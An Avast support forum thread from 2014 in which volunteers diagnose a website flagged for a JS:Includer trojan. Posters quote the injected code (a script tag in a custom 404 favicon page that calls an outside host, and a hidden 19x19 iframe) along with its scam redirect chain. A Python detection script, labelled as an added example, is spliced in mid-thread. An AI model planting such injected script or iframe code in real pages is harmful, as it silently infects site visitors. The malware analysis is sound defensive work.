Author Topic: Virus message on a specific website  (Read 5897 times)


REDACTED

  • Guest
Virus message on a specific website
« on: October 06, 2014, 10:20:42 AM »
Hi,

I still get a virus warning for a specific website. I contacted the provider to check the files on the webserver. I checked my PC several times; neither action resulted in finding the JS:Includer-ZG [Trj] virus. What can be the reason?

I'm using the free version of avast.
Program version: 2014.9.0.2012
definitions file: 2502.923

the website is www.jmiaa.nl

maybe it's just me  :-\

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76037
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

REDACTED

  • Guest
Re: Virus message on a specific website
« Reply #2 on: October 06, 2014, 01:26:15 PM »
Just for kicks...  Avast! indicates the trojan appears to be in the Favicon Icon.  This is not surprising, as Favicon and many browsers are very... flexible... about what constitutes an "icon".  It need not always be a .ico format  ???

Sucuri flags
Quote
Website Malware   malware-entry-mwjs150?v28   huup://wxw.jmiaa-nl/404testpage4525d2fdc ( View Payload )
Website Malware   malware-entry-mwjs150?v28   huup://wxw.jmiaa-nl/404javascript.js ( View Payload )

Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwjs150?v28
<script src=huup://amusecity-com/ii/smple.php ></script><BODY>

Gordon.

Offline HonzaZ

  • Avast team
  • Advanced Poster
  • *
  • Posts: 1038
Re: Virus message on a specific website
« Reply #3 on: October 06, 2014, 01:40:54 PM »
The favicon.ico returns a custom 404, which is infected:

...
<TITLE>404 Not Found</TITLE>
</HEAD>
<script src=hxxp://amusecity.com/ii/smple.php ></script><BODY>
<H1>Not Found</H1>
...

REDACTED

  • Guest
Re: Virus message on a specific website
« Reply #4 on: October 06, 2014, 02:00:45 PM »
So now the question is...  What's on that site, which seeks to infect you just by visiting it, that you really want to see?

-Noel

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33895
  • malware fighter
Re: Virus message on a specific website
« Reply #5 on: October 06, 2014, 11:46:08 PM »
Must not be an interesting enough scam to be willing to get exposed to the following threats.  ;D

Well the payload of this is more than likely:  [element] URL=amusecity dot com/gzcr?t=ZD1hbXVzZWNpdHkuY29tJmRpPTQ2ODE4NzQmYz0yMzQmaWE9MCZpdWY9MCZydT1hbXVzZWNpdHkuY29tJTJGaWklMkZzbXBsZS5waHAmcj0mdT0yMzI2 sending you here htxps://www.bodis.com//market//checkout
and there is where you get all the reds and goodies, read here for some user's ratings:
-> https://www.mywot.com/en/scorecard/bodis.com?utm_source=addon&utm_content=warn-viewsc
Scam, malware and viruses & Co awaiting you there.
Seen enough, be glad avast blocked you from getting infested going there.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

REDACTED

  • Guest
Re: Virus message on a specific website
« Reply #6 on: October 06, 2014, 11:50:08 PM »
-> http://sitecheck.sucuri.net/results/www.jmiaa.nl/

I was going to do this via Avast Feedback, but likely more people would see it here.

I'm also getting a whole-site false positive for  http://www.stream-recorder.com/forum/

It reports:
"Infection Blocked
Infection: JS:Includer-BFY [Trj]"

I have no reason to believe this is accurate. Virustotal reports 0 / 59 for a scan of this URL.

Avast is not even consistent on this, because the Avast WebRep browser plug-in gives the site a green 'O.K.' checkmark.

The alternate sitecheck link you suggest looks interesting, but they are promoting their own product for sale, and so might not be considered a neutral party.
When I fed it the url, it says that site runs on outdated software -- an older Apache server, to be specific.  So ?  I'm not going to let that stop me from visiting a very useful forum, or from white-listing it in Avast. 

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33895
  • malware fighter
Re: Virus message on a specific website
« Reply #7 on: October 07, 2014, 12:21:52 AM »
Hi JF-111

For the first detection discussed, convince yourself here: http://jsunpack.jeek.org/?report=353b4da59bb8be2f1196e35404e9bd54dbcefca5
Link for security researchers only, open up with NoScript active and in a VM.

In your case for what you reported, JF-111, the iFrame check on that url falls through: Suspicious

<iframe onload='oqybcm();' src='"+af4g2+"' width=19 height=19 frameborder=0 scrolling='no'></iframe>";document.body.appe etc.  avast! Webshield detects and blocks this as JS:Includer-BFY [Trj]

Not only avast and Sucuri flag it; here too it is rated 94 out of 100% malicious: http://zulu.zscaler.com/submission/show/b017087b6610875ea65432b2e7e4122b-1412633354

see: http://jsunpack.jeek.org/?report=f5a85c7727bfdc3cdf5a866d2b446ad3c77e49d8
Link for security researchers only, open up with NoScript active and in a VM.

polonus (volunteer website analyst)
Google browser difference found: Google: 94196 bytes       Firefox: 107066 bytes
Diff:         12870 bytes

First difference:
ionurl = "s=5e549ffc5984906d7f7d9a5343aae6e7&"; var imgdir_misc = "images/misc"; var vb_disable_ajax = parseint("0", 10); // --> </script><script type="text/javascript...

Make the admins on these forums aware of an outdated server software problem:
ISSUE DETECTED   DEFINITION   VULNERABLE HEADER
Outdated Web Server Apache Found   Vulnerabilities on Apache 2.2   Apache/2.2.26 (Amazon) PHP/5.3.28
exploitable: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6420
So that forum site now is vulnerable!!! Site is therefore blacklisted by Yandex: http://killmalware.com/www.stream-recorder.com/forum
This external link from site htxp://cdn.buyorselltnhomes.com/ has been blocked for me as well by an extension.

polonus
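As an added defender-side example (not code from the thread, nor from avast or Sucuri), here is a small Python check for the two shapes quoted above: a custom 404 page that pulls a script from a foreign host (HonzaZ's favicon.ico finding) and a near-invisible iframe like the 19x19 one in Reply #7. The site host and the sample HTML are constructed placeholders, not the real injected URLs.

```python
# Added example: flags the two 'includer' shapes quoted in this thread, an
# off-site <script src> in a (404) page and a tiny injected <iframe>.
from html.parser import HTMLParser
from urllib.parse import urlparse

def _px(value):
    """Parse a width/height attribute like '19' or '19px'; None if absent/odd."""
    if value is None:
        return None
    try:
        return int(str(value).strip().lower().rstrip("px"))
    except ValueError:
        return None

class _IncluderScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname
            # relative paths have no host; a foreign host is the includer sign
            if host and host.lower() != self.site_host:
                self.findings.append(("external_script", a["src"]))
        elif tag == "iframe":
            w, h = _px(a.get("width")), _px(a.get("height"))
            # 19x19 in the thread; anything this small is not meant to be seen
            if (w is not None and w <= 20) or (h is not None and h <= 20):
                self.findings.append(("tiny_iframe", a.get("src", "")))

def find_includer_indicators(html, site_host):
    """Return [(kind, src), ...] for off-site scripts and tiny iframes."""
    scanner = _IncluderScanner(site_host)
    scanner.feed(html)
    return scanner.findings

# Constructed sample modelled on the custom 404 quoted above (placeholder hosts)
SAMPLE_404 = """<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<script src=http://third-party.invalid/ii/loader.php ></script><BODY>
<H1>Not Found</H1>
<script src="/js/site.js"></script>
<iframe src="http://third-party.invalid/x" width=19 height=19 frameborder=0></iframe>
</BODY></HTML>"""

if __name__ == "__main__":
    for kind, src in find_includer_indicators(SAMPLE_404, "www.example.net"):
        print(kind, src)
```

Run it against the body you get back when requesting /favicon.ico: an icon that comes back as HTML at all is already suspicious, and any finding from this scan is worth reporting to the host.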

Offline bob3160

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 48550
  • 64 Years of Happiness
    • bob3160 Protecting Yourself, Your Computer and, Your Identity
Re: Virus message on a specific website
« Reply #8 on: October 07, 2014, 01:11:33 AM »
Quote
I have no reason to believe this is accurate. Virustotal reports 0 / 59 for a scan of this URL.

Avast is not even consistent on this, because the Avast WebRep browser plug-in gives the site a green 'O.K.' checkmark.
WebRep ratings are user ratings, not security or risk related. If the infection is new, it wouldn't show up there anyway.
Someone is always first with discovering an infected site. Since avast! has 220 million users worldwide, it usually doesn't take long for someone to auto-send information about a new infection to the avast! virus lab.
Today's safe site can be tomorrow's carrier of an infection.
Follow polonus's advice.

Free Security Seminar: https://bit.ly/bobg2023  -  Important: http://www.organdonor.gov/ -- My Web Site: http://bob3160.strikingly.com/ - Win 11 Pro v22H2 64bit, 16 Gig Ram, 1TB SSD, Avast Free 23.5.6066, How to Successfully Install Avast http://goo.gl/VLXdeRepair & Clean Install https://goo.gl/t7aJGq -- My Online Activity https://bit.ly/BobGInternet

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33895
  • malware fighter
Re: Virus message on a specific website
« Reply #9 on: October 07, 2014, 10:55:44 AM »
As bob3160 remarks, an infected website (whenever established as being infested or spreading malcode) seldom goes unnoticed, and all big vendors are automatically informed to add it to their detection patterns. Malware as a rule does not stay long on a website unless it is intentional; this is called OVERDUE! status, staying on for over 3000 hours and more.
The phase in which a website stays vulnerable and attractive to be attacked, exploited and often re-infested can be much longer when the security issues on a site are not being tackled. First come outdated CMS, vulnerable third-party code, plug-ins, themes, SE spam injections, iFrame malware and a long row of other issues, but also vulnerable server and PHP software versions that make these attacks worthwhile (in JF-111's example it was brought to my attention that there are approx. 28 XSS attack sinks there) are continuing threats.
There we also see a lot of insecurities in server HTTP header configuration that make it all the more attractive for attackers to seek known exploits against it once the info is spread to the world and attackers alike. When your domain, for instance, is hosted on one and the same IP with some thousand others and you have a hosting party where money comes first, you can imagine where that can lead. Most Internet users are not fully aware that that is the general situation we are in.

regards,

polonus
« Last Edit: October 07, 2014, 11:25:31 AM by polonus »